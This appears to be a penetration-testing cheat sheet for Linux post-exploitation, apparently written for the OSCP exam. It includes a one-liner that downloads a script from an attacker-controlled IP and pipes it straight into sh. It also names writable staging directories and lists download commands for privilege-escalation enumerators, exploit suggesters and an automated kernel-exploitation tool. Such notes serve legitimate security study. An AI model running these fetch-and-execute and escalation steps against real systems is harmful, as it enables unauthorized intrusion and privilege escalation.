# Linux post exploitation scripts

## Words of wisdom

**Be careful with the scripts you execute: auto-exploitation is strictly prohibited in the exam, and you will fail if you make this mistake, even unintentionally. ALWAYS check what you are running before executing it (pay attention to the word 'auto-exploitation' in scripts).**

### Execution of script

```
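# -q suppresses progress output, -O- writes the download to stdout so it can be piped
wget -qO- http://<Attacker_IP>/<script_name> | sh | tee output.txt

# This pulls the file from the attacker box, executes it and also stores the output in a txt file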
```

### Common locations with writable permissions to download and execute scripts

```
/tmp
/dev/shm
```

### bangenum.sh (initial Linux enumeration)

```
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh
```

### PSPY

What is running? Are there any cron jobs or scripts? Use PSPY to find out.

```
https://github.com/DominicBreuker/pspy
```

### linux-smart-enumeration

```
https://github.com/diego-treitos/linux-smart-enumeration
```

### SUID search

```
https://github.com/Anon-Exploiter/SUID3NUM
```

### xploit\_installer.py (exploit suggester)

```
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

USAGE: xploit_installer.py <exploit id>
```

### Unix Priv checker

```
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
```

### linux-local-enum.sh

```
wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh
```

### linuxprivchecker.py

```
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
```

### linux-exploit-suggester.sh

```
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
```

### KernelPop

Automated kernel vulnerability enumeration and exploitation

```
https://github.com/spencerdodd/kernelpop
```
